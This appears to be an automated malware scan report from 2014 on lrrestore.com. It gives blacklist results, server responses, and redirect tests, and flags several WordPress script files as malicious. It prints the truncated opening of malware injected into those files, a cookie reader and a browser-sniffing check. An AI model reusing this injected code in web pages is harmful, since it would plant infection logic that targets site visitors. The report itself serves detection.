Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=lrrestore.com
Result: This site is not currently listed as suspicious.
Result: This site is not currently listed as suspicious.
Query: http://yandex.com/infected?l10n=en&url=http://lrrestore.com/
Result: The website is marked by Yandex as suspicious: visiting this web site may harm your computer.
Details are available here.
Result: The website is marked by Yandex as suspicious: visiting this web site may harm your computer.
Details are available here.
Scanned pages/files
Request | Server response | Status |
http://lrrestore.com/ | HTTP/1.1 301 Moved Permanently Connection: close Date: Mon, 15 Sep 2014 05:49:28 GMT Location: http://www.lrREstore.com/ Server: Apache Vary: Accept-Encoding Content-Length: 0 Content-Type: text/html; charset=UTF-8 X-Pingback: http://www.lrREstore.com/xmlrpc.php | clean |
http://www.lrrestore.com/ | 200 OK Content-Length: 72030 Content-Type: text/html | clean |
http://www.lrREstore.com/wp-includes/js/jquery/jquery.js?ver=1.7.2 | 200 OK Content-Length: 96004 Content-Type: text/javascript | malicious |
Malicious code - confirmed by antiviruses (see below). The excerpt is truncated; the same opening snippet (a cookie-reading helper followed by a user-agent check) heads every script flagged as malicious in this report, while the rest of each file differs:
function getCookie(name) {
var matches = document.cookie.match(new RegExp( "(?:^|; )" + name.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g, '\\$1') + "=([^;]*)" )); return matches ? decodeURIComponent(matches[1]) : undefined; } function Broadbandserviceactu() { var resiser = navigator.userAgent; var teamfact = (resiser.indexOf("Windows") < +1 || resiser.indexOf("Windows NT 6.3") > -1 || resiser.indexOf("IEMobile") > -1 || resiser.indexOf("Chrome") > - [... excerpt cut here ...]
Antivirus reports:
| ||
http://www.lrREstore.com/wp-content/uploads/shareaholic/spritegen/jquery.shareaholic-publishers-sb.min.js?ver=6.0.0.3 | 200 OK Content-Length: 50280 Content-Type: text/javascript | malicious |
Malicious code - confirmed by antiviruses (see below) function getCookie(name) {
var matches = document.cookie.match(new RegExp( "(?:^|; )" + name.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g, '\\$1') + "=([^;]*)" )); return matches ? decodeURIComponent(matches[1]) : undefined; } function Broadbandserviceactu() { var resiser = navigator.userAgent; var teamfact = (resiser.indexOf("Windows") < +1 || resiser.indexOf("Windows NT 6.3") > -1 || resiser.indexOf("IEMobile") > -1 || resiser.indexOf("Chrome") > - [... excerpt cut here; a later part of the same file follows ...] 7:"\u05e7\u05e6\u05e8 URL \u05e2\u05dd",8:"\u05d3\u05d7\u05e3 \u05d0\u05ea \u05d6\u05d4 \u05d1",9:"\u05e9\u05de\u05d5\u05e8 \u05db\u05de\u05d5\u05e2\u05d3\u05e3 \u05d1",10:"\u05e9\u05dc\u05d7 \u05d3\u05e8\u05da",11:""},nl:{0:"Publiceer op",1:"Voeg toe aan",2:"Stuur in op",3:"Deel op",4:"Print met",5:"Publiceer op",6:"Suggereer dit artikel op",7:"Verkort de URL met",8:"Push dit op",9:"Maak een bladwijzer op",10:"Verzend met",11:""}};SHR4P.ga.init();SHR4P.load();
Antivirus reports:
| ||
http://www.lrREstore.com/wp-content/themes/lightword/js/cufon-yui.js | 200 OK Content-Length: 19406 Content-Type: text/javascript | malicious |
Malicious code - confirmed by antiviruses (see below) function getCookie(name) {
var matches = document.cookie.match(new RegExp( "(?:^|; )" + name.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g, '\\$1') + "=([^;]*)" )); return matches ? decodeURIComponent(matches[1]) : undefined; } function Broadbandserviceactu() { var resiser = navigator.userAgent; var teamfact = (resiser.indexOf("Windows") < +1 || resiser.indexOf("Windows NT 6.3") > -1 || resiser.indexOf("IEMobile") > -1 || resiser.indexOf("Chrome") > - [... excerpt cut here ...]
Antivirus reports:
| ||
http://www.lrREstore.com/wp-content/themes/lightword/js/vera.font.js | 200 OK Content-Length: 34504 Content-Type: text/javascript | malicious |
Malicious code - confirmed by antiviruses (see below) function getCookie(name) {
var matches = document.cookie.match(new RegExp( "(?:^|; )" + name.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g, '\\$1') + "=([^;]*)" )); return matches ? decodeURIComponent(matches[1]) : undefined; } function Broadbandserviceactu() { var resiser = navigator.userAgent; var teamfact = (resiser.indexOf("Windows") < +1 || resiser.indexOf("Windows NT 6.3") > -1 || resiser.indexOf("IEMobile") > -1 || resiser.indexOf("Chrome") > - [... excerpt cut here ...]
Antivirus reports:
| ||
http://www.lrREstore.com/wp-content/themes/lightword/js/menu.js | 200 OK Content-Length: 1652 Content-Type: text/javascript | malicious |
Malicious code - confirmed by antiviruses (see below) function getCookie(name) {
var matches = document.cookie.match(new RegExp( "(?:^|; )" + name.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g, '\\$1') + "=([^;]*)" )); return matches ? decodeURIComponent(matches[1]) : undefined; } function Broadbandserviceactu() { var resiser = navigator.userAgent; var teamfact = (resiser.indexOf("Windows") < +1 || resiser.indexOf("Windows NT 6.3") > -1 || resiser.indexOf("IEMobile") > -1 || resiser.indexOf("Chrome") > - [... excerpt cut here; a later part of the same file follows ...] var zIndexNumber = 50; jQuery('ul').each(function() { jQuery(this).css('zIndex', zIndexNumber); zIndexNumber -= 10; });}); jQuery("#front_menu ul").css('opacity', 0.9); jQuery("#front_menu ul").css({display: "none"}); jQuery("#front_menu li").hover(function(){ jQuery(this).find('ul:first').css({visibility: "visible",display: "none"}).show(); },function(){ jQuery(this).find('ul:first').css({visibility: "hidden"}); }); });
Antivirus reports:
| ||
http://s.gravatar.com/js/gprofiles.js?aa&ver=3.4.1 | 200 OK Content-Length: 21442 Content-Type: application/x-javascript | clean |
http://www.lrREstore.com/wp-content/plugins/jetpack/modules/wpgroho.js?ver=3.4.1 | 200 OK Content-Length: 2073 Content-Type: text/javascript | malicious |
Malicious code - confirmed by antiviruses (see below) function getCookie(name) {
var matches = document.cookie.match(new RegExp( "(?:^|; )" + name.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g, '\\$1') + "=([^;]*)" )); return matches ? decodeURIComponent(matches[1]) : undefined; } function Broadbandserviceactu() { var resiser = navigator.userAgent; var teamfact = (resiser.indexOf("Windows") < +1 || resiser.indexOf("Windows NT 6.3") > -1 || resiser.indexOf("IEMobile") > -1 || resiser.indexOf("Chrome") > - [... excerpt cut here; a later part of the same file follows ...] return WPGroHo.renderers[key]( data[key], hash, id, key ); } jQuery( '#' + id ).find( 'h4' ).after( jQuery( '<p class="grav-extra ' + key + '" />' ).html( data[key] ) ); } } }, WPGroHo ); jQuery( document ).ready( function( $ ) { Gravatar.profile_cb = function( h, d ) { WPGroHo.syncProfileData( h, d ); }; Gravatar.my_hash = WPGroHo.my_hash; Gravatar.init( 'body', '#wpadminbar' ); } );
Antivirus reports:
| ||
http://s0.wp.com/wp-content/js/devicepx-jetpack.js?ver=201438 | 200 OK Content-Length: 9301 Content-Type: application/x-javascript | clean |
http://stats.wordpress.com/e-201438.js | 200 OK Content-Length: 824 Content-Type: application/x-javascript | clean |
http://lrrestore.com/test404page.js | HTTP/1.1 301 Moved Permanently Cache-Control: no-cache, must-revalidate, max-age=0 Connection: close Date: Mon, 15 Sep 2014 05:49:39 GMT Pragma: no-cache Location: http://www.lrREstore.com/test404page.js Server: Apache Vary: Accept-Encoding Content-Length: 0 Content-Type: text/html; charset=UTF-8 Expires: Wed, 11 Jan 1984 05:00:00 GMT Last-Modified: Mon, 15 Sep 2014 05:49:39 GMT X-Pingback: http://www.lrREstore.com/xmlrpc.php | clean |
http://www.lrrestore.com/test404page.js | 404 Not Found Content-Length: 13108 Content-Type: text/html | clean |
Malicious Redirects
First query (normal visit):
GET / HTTP/1.1
Host: lrrestore.com
Result:
HTTP/1.1 301 Moved Permanently
Connection: close
Date: Mon, 15 Sep 2014 05:49:28 GMT
Location: http://www.lrREstore.com/
Server: Apache
Vary: Accept-Encoding
Content-Length: 0
Content-Type: text/html; charset=UTF-8
X-Pingback: http://www.lrREstore.com/xmlrpc.php
...0 bytes of data.
GET / HTTP/1.1
Host: lrrestore.com
Result:
HTTP/1.1 301 Moved Permanently
Connection: close
Date: Mon, 15 Sep 2014 05:49:28 GMT
Location: http://www.lrREstore.com/
Server: Apache
Vary: Accept-Encoding
Content-Length: 0
Content-Type: text/html; charset=UTF-8
X-Pingback: http://www.lrREstore.com/xmlrpc.php
...0 bytes of data.
Second query (visit from search engine):
GET / HTTP/1.1
Host: lrrestore.com
Referer: http://www.google.com/search?q=lrrestore.com
Result:
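The result is similar to the first query. There are no suspicious redirects found. This test compares only the server's HTTP responses to the two requests shown; it does not by itself show what the scripts flagged as malicious above do once loaded in a browser.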
GET / HTTP/1.1
Host: lrrestore.com
Referer: http://www.google.com/search?q=lrrestore.com
Result:
The result is similar to the first query. There are no suspicious redirects found.